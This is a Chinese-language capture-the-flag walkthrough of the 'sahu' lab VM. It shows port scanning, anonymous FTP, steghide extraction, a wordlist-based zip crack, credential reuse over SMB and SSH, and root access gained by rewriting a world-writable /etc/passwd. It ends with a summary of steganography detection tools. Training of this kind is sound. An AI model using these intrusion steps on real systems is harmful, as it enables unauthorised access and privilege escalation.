sahu 靶机

信息收集

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.139                         
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-05 08:06 EDT
Nmap scan report for 192.168.56.139
Host is up (0.00037s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
MAC Address: 08:00:27:4D:A7:81 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 9.41 seconds

开放了 21,22,80,139,445 端口

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ sudo nmap -sT -sV -sC -O -p21,22,80,139,445 192.168.56.139
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 23:34 EDT
Nmap scan report for 192.168.56.139
Host is up (0.00049s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.56.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             230 Jan 30  2020 ftp.zip
22/tcp  open  ssh         OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:78:c5:73:f2:86:cb:cb:02:7f:b6:72:85:61:ac:91 (RSA)
|   256 22:1a:ee:1a:98:4f:32:e7:dc:30:43:52:2c:b2:24:06 (ECDSA)
|_  256 1a:9b:28:b3:ad:58:32:e9:6c:f3:ea:3b:cf:6b:08:ad (ED25519)
80/tcp  open  http        Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn\'t have a title.
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAHU)
445/tcp open  �.,��U      Samba smbd 4.10.7-Ubuntu (workgroup: SAHU)
MAC Address: 08:00:27:4D:A7:81 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: SAHU-VIRTUALBOX; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.10.7-Ubuntu)
|   Computer name: sahu-virtualbox
|   NetBIOS computer name: SAHU-VIRTUALBOX\x00
|   Domain name: \x00
|   FQDN: sahu-virtualbox
|_  System time: 2023-09-05T09:04:26+05:30
| smb2-time: 
|   date: 2023-09-05T03:34:26
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: SAHU-VIRTUALBOX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: -1h50m02s, deviation: 3h10m31s, median: -2s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds

Ubuntu 操作系统，ftp 存在匿名登录。

目录爆破

目录爆破一下

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ sudo dirsearch -u http://192.168.56.139/                  
[sudo] password for kali: 

  _|. _ _  _  _  _ _|_    v0.4.2                                                                                     
 (_||| _) (/_(_|| (_| )                                                                                              
                                                                                                                     
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /root/.dirsearch/reports/192.168.56.139/-_23-09-04_23-57-31.txt

Error Log: /root/.dirsearch/logs/errors-23-09-04_23-57-31.log

Target: http://192.168.56.139/

[23:57:31] Starting: 
[23:57:33] 403 -  279B  - /.ht_wsr.txt                                     
[23:57:33] 403 -  279B  - /.htaccess.orig
[23:57:33] 403 -  279B  - /.htaccess_sc
[23:57:33] 403 -  279B  - /.htaccess.sample
[23:57:33] 403 -  279B  - /.htaccess.save
[23:57:33] 403 -  279B  - /.htaccess.bak1
[23:57:33] 403 -  279B  - /.htaccess_orig
[23:57:33] 403 -  279B  - /.htaccess_extra
[23:57:33] 403 -  279B  - /.htaccessBAK
[23:57:33] 403 -  279B  - /.htaccessOLD
[23:57:33] 403 -  279B  - /.html
[23:57:33] 403 -  279B  - /.htaccessOLD2                                   
[23:57:33] 403 -  279B  - /.htm
[23:57:33] 403 -  279B  - /.htpasswd_test
[23:57:33] 403 -  279B  - /.htpasswds
[23:57:33] 403 -  279B  - /.httr-oauth                                     
[23:57:50] 200 -  194B  - /index.php                                        
[23:57:59] 403 -  279B  - /server-status                                    
[23:57:59] 403 -  279B  - /server-status/

没什么有价值的信息，换一个目录爆破工具

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ sudo gobuster dir -u http://192.168.56.139 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,rar,zip,sql
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.139
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              php,txt,rar,zip,sql
[+] Timeout:                 10s
===============================================================
2023/09/04 23:58:47 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 194]
/H                    (Status: 301) [Size: 312] [--> http://192.168.56.139/H/]
/server-status        (Status: 403) [Size: 279]
Progress: 1323243 / 1323366 (99.99%)
===============================================================
2023/09/05 00:02:02 Finished
===============================================================

只有一个 /H ，再换一个工具

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ sudo feroxbuster -u http://192.168.56.139 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[sudo] password for kali: 

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.10.0
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://192.168.56.139
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.10.0
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 4
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
404      GET        9l       31w      276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      279c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200      GET      494l     1388w   129302c http://192.168.56.139/Haryana-1-1.jpg
200      GET       10l       14w      194c http://192.168.56.139/
301      GET        9l       28w      312c http://192.168.56.139/H => http://192.168.56.139/H/
301      GET        9l       28w      314c http://192.168.56.139/H/A => http://192.168.56.139/H/A/
301      GET        9l       28w      316c http://192.168.56.139/H/A/R => http://192.168.56.139/H/A/R/
[####################] - 4m    882197/882197  0s      found:5       errors:9660   
[####################] - 4m    220546/220546  859/s   http://192.168.56.139/ 
[####################] - 4m    220546/220546  858/s   http://192.168.56.139/H/ 
[####################] - 4m    220546/220546  858/s   http://192.168.56.139/H/A/ 
[####################] - 4m    220546/220546  858/s   http://192.168.56.139/H/A/R/

隐藏目录

http://192.168.56.139/H/A/R/ 这个目录看起来有意思，看一眼 Web 界面

这个标题有意思，尝试 http://192.168.56.139/H/A/R/Y/A/N/A

看到了一个暗示

1	`# try to extract with hurrry`

FTP 匿名登录

FTP 匿名登录看一下

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ ftp 192.168.56.139
Connected to 192.168.56.139.
220 (vsFTPd 3.0.3)
Name (192.168.56.139:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||15856|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0             230 Jan 30  2020 ftp.zip
226 Directory send OK.
ftp> get ftp.zip
local: ftp.zip remote: ftp.zip
229 Entering Extended Passive Mode (|||12832|)
150 Opening BINARY mode data connection for ftp.zip (230 bytes).
100% |***********************************************************************|   230        4.66 MiB/s    00:00 ETA
226 Transfer complete.
230 bytes received in 00:00 (452.84 KiB/s)
ftp> pwd
Remote directory: /

试一试拿到的提权的口令，提取不出来。在这里卡了许久，尝试对 Web 界面中的图片进行查看，exiftool, strings, binwalk, file 都没有收获。使用 zip2john 转换后再爆破，依然无结果。尝试使用这个口令登录 ssh 和 smb，依然不成功。

图片隐写信息提取

这个过程中发现自己对于隐写方面还是不够熟悉，这个靶机最后会增加一个隐写方法和如何识别的概括。这里提示中的提取，也可以是使用隐写工具提取信息的口令

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ steghide extract -sf Haryana-1-1.jpg 
Enter passphrase: 
wrote extracted data to "file.txt".


┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ cat file.txt 
      I have found the password for a zip file but i have forgote the last part of it, can you find out
     
       5AHU**

发现了解压密码的前四位，看样子接下来是需要我们想办法生成字典再爆破了

字典生成

这里可以使用的生成字典的工具有很多，我尝试过的有：crunch, pydictor.py

LandGrey/pydictor: A powerful and useful hacker dictionary builder for a brute-force attack (github.com)

┌──(kali㉿kali)-[~/Downloads/sahu/pydictor]
└─$ python pydictor.py -char "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\!@#$%^&*" --len 2 2 --head 5AHU --output ../dict_py
                              _ _      _
              _ __  _   _  __| (_) ___| |_ ___  _ __                                                                
             | '_ \| | | |/ _` | |/ __| __/ _ \| '__|                                                               
             | |_) | |_| | (_| | | (__| || (_) | |                                                                  
             | .__/ \__, |\__,_|_|\___|\__\___/|_|                                                                  
             |_|    |___/                            2.1.7.3#dev                                                    

[+] A total of :4900 lines
[+] Store in   :/home/kali/Downloads/sahu/dict_py/char_050009.txt 
[+] Cost       :0.0417 seconds

其实生成密码也是有一定技巧的，一开始我想找个可以直接指定前缀的密码工具，但是仔细一想，我可以通过 sed 或者 awk 工具将前缀加上去，这样不久把问题简化为生成两位的随机字符或数字

zip 密码爆破

使用 fcrackzip 工具来爆破

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ fcrackzip  -D -p dict_py/char_050009.txt -u ftp.zip 


PASSWORD FOUND!!!!: pw == 5AHU#5

得到了密码。实际上在这里花了很多时间，有一部分原因是我想一劳永逸，找一个最好用最常用的工具用熟练，但事实是每个工具都各有优缺点，与其花时间去找工具，不如去弄清楚自己到底想拿到什么样的一个字典（这里生成的字典的目标很简单，只需要固定前四个字符，然后生成包含大写、字符，小写也可以纳入考虑）

使用密码 5AHU#5 来解压

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ cat ftp.txt        

      USERNAME = sahu
      PASSWORD = sahu14216

使用上述用户名和密码登录 ssh，失败。尝试登录 smb

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ smbclient //192.168.56.139/sambashare -U sahu%sahu14216 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Jan 30 03:50:23 2020
  ..                                  D        0  Thu Jan 30 02:57:06 2020
  ssh.txt                             N       64  Thu Jan 30 03:50:02 2020

                10253588 blocks of size 1024. 4282444 blocks available
smb: \> get ssh.txt 
getting file \ssh.txt of size 64 as ssh.txt (8.9 KiloBytes/sec) (average 8.9 KiloBytes/sec)
smb: \>

拿到了一个 ssh.txt

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ cat ssh.txt 
   ssh users list
   USERNAME = haryana
   PASSWORD = hralltime

尝试使用此用户名和密码登录 ssh

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ ssh haryana@192.168.56.139
haryana@192.168.56.139\'s password: 
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-18-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


156 updates can be installed immediately.
77 of these updates are security updates.
To see these additional updates run: apt list --upgradable

Failed to connect to https://changelogs.ubuntu.com/meta-release. Check your Internet connection or proxy settings

Last login: Tue Feb  4 18:05:07 2020 from 192.168.43.111
haryana@sahu-VirtualBox:~$ whoami
haryana
haryana@sahu-VirtualBox:~$ id
uid=1001(haryana) gid=1001(haryana) groups=1001(haryana)
haryana@sahu-VirtualBox:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:4d:a7:81 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.139/24 brd 192.168.56.255 scope global dynamic noprefixroute enp0s3
       valid_lft 502sec preferred_lft 502sec
    inet6 fe80::853d:613f:7377:f9e7/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
haryana@sahu-VirtualBox:~$ sudo -l
[sudo] password for haryana: 
Sorry, user haryana may not run sudo on sahu-VirtualBox.

敏感文件查看

haryana@sahu-VirtualBox:~$ ls -alih
total 40K
295542 drwxr-xr-x 6 haryana haryana 4.0K Feb  4  2020 .
262147 drwxr-xr-x 4 root    root    4.0K Jan 30  2020 ..
268530 -rw------- 1 haryana haryana  179 Feb  4  2020 .bash_history
268529 -rw-r--r-- 1 haryana haryana  220 Jan 30  2020 .bash_logout
268527 -rw-r--r-- 1 haryana haryana 3.7K Jan 30  2020 .bashrc
295605 drwxr-x--- 4 haryana haryana 4.0K Feb  4  2020 .cache
295602 drwxr-x--- 4 haryana haryana 4.0K Feb  4  2020 .config
295600 drwx------ 3 haryana haryana 4.0K Feb  4  2020 .gnupg
295584 drwxrwxr-x 3 haryana haryana 4.0K Jan 30  2020 .local
262309 -rw-r--r-- 1 haryana haryana  807 Jan 30  2020 .profile
haryana@sahu-VirtualBox:~$ cat .bash_history
cd sahu
ls
cd sambashare/
ls
nano /etc/passwd
su sahu
cd ..
cd sahu
ls
cd ..
su sahu
cd
pwd
cd ../
ls
cd sahu/
ls
cd ../..
ls
cd root/
sudo cd root
su sahu
cd /etc/
ls -l
su sahu

passwd 写入提权

查看敏感文件发现用户似乎编辑过 passwd 文件，查看 passwd 文件权限

1
2
3

haryana@sahu-VirtualBox:~$ ls -liah /etc/passwd
163753 -rwxrwxrwx 1 root root 2.9K Jan 30  2020 /etc/passwd
haryana@sahu-VirtualBox:~$ nano /etc/passwd

写入 passwd 提权尝试，先在本机生成哈希值

1
2
3

┌──(kali㉿kali)-[~/Downloads/sahu]
└─$ openssl passwd passwd123            
$1$lz2D4Jlh$P827XXbXI15iGa9pxqcf/0

替换掉 passwd 中 root 用户那一行代表密码的 x 字母

haryana@sahu-VirtualBox:~$ nano /etc/passwd
haryana@sahu-VirtualBox:~$ su root
Password: 
root@sahu-VirtualBox:/home/haryana# cd /root
root@sahu-VirtualBox:~# ls -liah
total 32K
524291 drwx------  4 root root 4.0K Jan 30  2020 .
     2 drwxr-xr-x 20 root root 4.0K Jan 29  2020 ..
524308 -rw-------  1 root root 1.5K Feb  4  2020 .bash_history
524306 -rw-r--r--  1 root root 3.1K Aug 28  2019 .bashrc
524305 drwx------  2 root root 4.0K Oct 17  2019 .cache
557482 drwxr-xr-x  3 root root 4.0K Jan 30  2020 .local
524307 -rw-r--r--  1 root root  148 Aug 28  2019 .profile
524338 -rw-r--r--  1 root root  123 Jan 30  2020 root.txt
root@sahu-VirtualBox:~# cat root.txt
   GREATE YOU FINISH THIS TASK
                               CONGRATS!!!!!!!!!!!!
     TELL ME ON TWITTER  @VivekGautam09

jpg 图片信息隐藏小结

这里并不对原理做过多解释，而是着重于判断和工具利用

exif 信息

exiftool 工具主要针对图片信息中的 Exif 数据区，这部分通常保存有拍摄相关信息和 comment 信息，符合 JPEG 标准

可编辑 Exit 信息的工具：MagicEXIF

图片隐写方法

常见的隐写方法包括 DCT 加密、LSB 加密、DCT LSB、Average DCT、High Capacity DCT、High Capacity DCT - Algorithm

常见的隐写工具包括：JSteg、JPHide、OutGuess、Invisible Secrets、F5、appendX、Camouflage

图片隐写检测工具

常用的检测工具：

stegdetect
- 安装方法：我是通过安装 deb 包再通过 apt --fix-broken install 自动解决了依赖问题，deb 包的网址 http://old-releases.ubuntu.com/ubuntu/pool/universe/s/stegdetect/
- 可能还需要下载配置文件，不过运行似乎还是有问题 wget https://github.com/poizan42/stegdetect/blob/46a09e93320cd63b6731e0bc5b22c11c588a0e81/rules.ini
- 建议 Windows 上使用得了

-s 修改检测算法的敏感度，该值的默认值为1。检测结果的匹配度与检测算法的敏感度成正比，算法敏感度的值越大，检测出的可疑文件包含敏感信息的可能性越大
t – 设置要检测哪些隐写工具（默认检测jopi），可设置的选项如下：
j – 检测图像中的信息是否是用jsteg嵌入的。
o – 检测图像中的信息是否是用outguess嵌入的。
p – 检测图像中的信息是否是用jphide嵌入的。
i – 检测图像中的信息是否是用invisible secrets嵌入的。

steghide 可以设置密码
- 常用的爆破工具 https://github.com/Va5c0/Steghide-Brute-Force-Tool
  - python steg_brute.py -b -d [字典] -f [jpg_file]
  - 需要安装库 progressbar2，因为是 python2 的工具，需要先为 python2安装 pip，参见 [[../technique/zheteng/Python2.7 install pip|Python2.7 install pip]]
  - StegBrute 的运行必须依赖于 Steghide
- stegseek 比 stebrute 的速度更快
- steghide info
- steghide -sf filename
F5 隐写 https://github.com/matthewgao/F5-steganography
- java Extract 1.jpg -p 123456
outguess是一种通用的隐写工具，允许插入隐藏信息到数据源的冗余位中。 https://github.com/crorvick/outguess
- ./configure && make && make install
- outguess -k "my secret key" -d hidden.txt demo.jpg out.jpg
stegsolve 逐层看是否有图像隐藏
binwalk 提取文件
zsteg 可以作为 binwalk 的补充工具
- 安装需要有 ruby 环境